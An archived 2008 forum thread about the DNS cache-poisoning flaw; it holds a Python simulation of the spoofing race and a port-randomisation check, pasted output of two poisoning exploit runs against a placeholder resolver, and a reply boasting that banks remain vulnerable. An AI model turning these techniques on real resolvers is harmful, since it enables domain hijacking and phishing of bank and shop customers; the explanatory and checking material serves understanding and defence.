
View Full Version : The most serious security bug in history of Internet



tonynuc
11-07-2008, 10:37 AM
And that is the truly frightening DNS cache poisoning vulnerability that every machine in the world using DNS is currently a victim of. Worse still, there is no patch out yet, because it is a weakness of the DNS protocol itself: the 16-bit transaction ID, and a source port that is not randomized enough.

Attackers can make money from spoofing domain names such as e-banking and e-commerce web sites to do phishing.

Check whether the DNS server you are using is vulnerable:

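To make the "16-bit ID plus predictable source port" point concrete, here is an added Python model of the race the post describes (this is illustration code, not the thread's checker or exploit). A resolver accepts the first reply whose transaction ID and UDP port match its outstanding query; the attacker forces a lookup of a never-cached name and floods guessed replies before the real answer arrives. The ratio of 20 spoofed replies per query and the attempt budgets are assumptions taken from the output pasted later in the thread, port 53 is assumed as the fixed port of a non-randomising resolver, and the 1024..65535 pool is an assumed ephemeral range. The second function is the kind of check a port-randomisation tester does: look at the source ports of the queries a resolver sends out.

```python
"""Model of the 2008 DNS cache-poisoning weakness (added example).

A resolver accepts a reply when the 16-bit TXID and the UDP source port
match its outstanding query. With a fixed port only the TXID is secret.
"""
import random

TXID_SPACE = 1 << 16                    # 16-bit transaction ID
EPHEMERAL_PORTS = range(1024, 65536)    # assumed randomised port pool
FIXED_PORT = 53                         # assumed fixed port of an unpatched resolver


def expected_queries(guesses_per_query, randomize_port):
    """Mean number of attacker-triggered queries before one spoofed reply
    matches: size of the secret space divided by guesses per query."""
    space = TXID_SPACE * (len(EPHEMERAL_PORTS) if randomize_port else 1)
    return space / guesses_per_query


def simulate(seed, randomize_port, guesses_per_query=20, max_queries=50000):
    """Kaminsky-style race.  Each attempt: the attacker asks the resolver for a
    fresh random name (so the cache never answers), the resolver emits a query
    with a new TXID (and a new port if randomising), and the attacker sends
    `guesses_per_query` spoofed replies before the real one lands.  Returns the
    attempt number at which poisoning succeeded, or None if the budget ran out.
    """
    rng = random.Random(seed)           # seeded so the run is reproducible
    for attempt in range(1, max_queries + 1):
        txid = rng.randrange(TXID_SPACE)
        port = rng.choice(EPHEMERAL_PORTS) if randomize_port else FIXED_PORT
        for _ in range(guesses_per_query):
            guess_txid = rng.randrange(TXID_SPACE)
            # A fixed port is observable, so the attacker only guesses the TXID;
            # a randomised port has to be guessed as well.
            guess_port = rng.choice(EPHEMERAL_PORTS) if randomize_port else FIXED_PORT
            if guess_txid == txid and guess_port == port:
                return attempt
    return None


def assess_source_ports(observed_ports):
    """Classify the source ports seen on a resolver's outgoing queries.
    Returns 'fixed', 'sequential' or 'random'.  Fixed or sequential ports
    leave the attacker only the 16-bit TXID to guess."""
    if len(observed_ports) < 4:
        raise ValueError("need several observed queries to judge")
    if len(set(observed_ports)) == 1:
        return "fixed"
    steps = {b - a for a, b in zip(observed_ports, observed_ports[1:])}
    if steps == {1}:
        return "sequential"
    return "random"


if __name__ == "__main__":
    # Constructed sample: ten queries seen from a resolver that reuses one port.
    sample_ports = [FIXED_PORT] * 10
    print("port check:", assess_source_ports(sample_ports))
    for randomised in (False, True):
        print("randomised port" if randomised else "fixed port",
              "expected queries:", expected_queries(20, randomised),
              "simulated:", simulate(seed=1, randomize_port=randomised,
                                     max_queries=5000))
```

With 20 spoofed replies per query and a fixed port the mean is 65536 / 20 = 3276.8 queries; the distribution is geometric, so a run finishing after 7000 attempts as in the pasted output is unremarkable. Randomising the source port multiplies the search space by the size of the port pool, which is why the fix in 2008 was port randomisation rather than a change to the 16-bit ID.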

tonynuc
24-07-2008, 11:15 AM
Exploit version 1:
Hijack individual host in a domain:
Targeting nameserver A.B.C.D
Querying recon nameserver for example.com.'s nameservers...
Got answer with 2 answers, 0 authorities
Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.
Querying recon nameserver for address of ns89.worldnic.com....
Got answer with 1 answers, 0 authorities
Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45
Checking Authoritativeness: Querying 205.178.190.45 for example.com....
ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.
Querying recon nameserver for address of ns90.worldnic.com....
Got answer with 1 answers, 0 authorities
Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45
Checking Authoritativeness: Querying 205.178.144.45 for example.com....
ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...
Sent 1000 queries and 20000 spoofed responses...
Sent 2000 queries and 40000 spoofed responses...
Sent 3000 queries and 60000 spoofed responses...
Sent 4000 queries and 80000 spoofed responses...
Sent 5000 queries and 100000 spoofed responses...
Sent 6000 queries and 120000 spoofed responses...
Sent 7000 queries and 140000 spoofed responses...
Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7

Exploit version 2:
Hijack entire domain using spoofed replies:
b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
Querying recon nameserver for address of a.iana-servers.net....
Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
Checking Authoritativeness: Querying 192.0.34.43 for example.com....
a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
Sent 1000 queries and 20000 spoofed responses...
Sent 2000 queries and 40000 spoofed responses...
Sent 3000 queries and 60000 spoofed responses...
Sent 4000 queries and 80000 spoofed responses...
Sent 5000 queries and 100000 spoofed responses...
Sent 6000 queries and 120000 spoofed responses...
Sent 7000 queries and 140000 spoofed responses...
Sent 8000 queries and 160000 spoofed responses...
Sent 9000 queries and 180000 spoofed responses...
Sent 10000 queries and 200000 spoofed responses...
Sent 11000 queries and 220000 spoofed responses...
Sent 12000 queries and 240000 spoofed responses...
Sent 13000 queries and 260000 spoofed responses...
Poisoning successful after 13250 attempts: example.com. == dns01.pwned.com
Auxiliary module execution completed

dig +short -t ns example.com @A.B.C.D

dns01.pwned.com

Exploit code:


testman
05-09-2008, 08:29 PM
I know this bug and how to exploit it..

Making a video tutorial about it would be awesome hahaha..

But I am afraid of skiddies who will play with it; it should be priv8 and stay priv8.

Most of the important companies like live.com and ebay have corrected the vuln. And a lot of banks are still vulnerable.

The result of the vuln is that now we find more exploits on Google than papers on how to correct it..